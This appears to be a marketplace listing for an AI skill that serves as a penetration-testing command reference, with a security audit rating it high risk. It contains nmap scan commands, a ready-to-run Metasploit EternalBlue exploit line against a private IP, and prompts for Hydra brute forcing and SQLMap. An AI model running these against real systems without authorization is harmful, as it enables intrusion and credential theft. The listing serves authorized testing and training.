pentest-commands
Pentest Commands Reference
This skill provides a comprehensive command reference for penetration testing tools. It helps security professionals quickly lookup nmap, Metasploit, nikto, SQLMap, Hydra, and other security testing commands during authorized assessments.
تنزيل ZIP المهارة
رفع في Claude
اذهب إلى Settings → Capabilities → Skills → Upload skill
فعّل وابدأ الاستخدام
اختبرها
استخدام "pentest-commands". Show me nmap commands for scanning ports on 192.168.1.1
النتيجة المتوقعة:
TCP SYN scan (stealth): nmap -sS 192.168.1.1
Full TCP connect scan: nmap -sT 192.168.1.1
UDP scan: nmap -sU 192.168.1.1
All ports: nmap -p- 192.168.1.1
Service versions: nmap -sV 192.168.1.1
OS detection: nmap -O 192.168.1.1
Comprehensive scan: nmap -A 192.168.1.1
استخدام "pentest-commands". What are the Metasploit commands to use the EternalBlue exploit?
النتيجة المتوقعة:
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"
Or interactive: msfconsole > search type:exploit name:ms17_010
> use exploit/windows/smb/ms17_010_eternalblue
> set RHOST 192.168.1.1
> exploit
التدقيق الأمني
مخاطر عاليةThis skill provides a comprehensive reference for penetration testing tools including Metasploit, nmap, nikto, SQLMap, Hydra, John the Ripper, and Aircrack-ng. The static analysis confirmed critical findings related to exploitation frameworks and password cracking tools. While this is a legitimate security testing reference for authorized use, it provides unconstrained access to dangerous tools without authorization verification. Risk Level: HIGH - Recommend restricted distribution or content modifications to add authorization safeguards.
مشكلات حرجة (2)
مشكلات عالية المخاطر (3)
مشكلات متوسطة المخاطر (2)
مشكلات منخفضة المخاطر (1)
عوامل الخطر
⚙️ الأوامر الخارجية (37)
🌐 الوصول إلى الشبكة (84)
📁 الوصول إلى نظام الملفات (2)
الأنماط المكتشفة
درجة الجودة
ماذا يمكنك بناءه
Security Professional Quick Reference
Professional penetration testers use this skill as a quick command lookup during authorized security assessments. The comprehensive command reference saves time searching through documentation.
Security Training and Education
Students learning penetration testing use this skill to understand proper command syntax for various security testing tools in lab environments.
Red Team Operations
Red team members use this command reference during authorized red team engagements to quickly execute network scanning, exploitation, and post-exploitation commands.
جرّب هذه الموجهات
Show me nmap commands for scanning a target network 192.168.1.0/24 to discover live hosts and open ports
Find Metasploit commands to search for and use the EternalBlue exploit against a Windows target
Show Hydra commands for brute forcing SSH login and John the Ripper commands for cracking password hashes
Provide nikto and SQLMap commands for testing a web application at http://192.168.1.100 for vulnerabilities
أفضل الممارسات
- Always verify you have written authorization before testing any target system
- Use timing templates (-T4, -T5) carefully to avoid detection or system impact
- Document all commands executed and findings for penetration test reports
تجنب
- Never use these commands against systems without explicit authorization
- Avoid running aggressive scans that could disrupt production systems
- Do not share or publish results that could aid malicious actors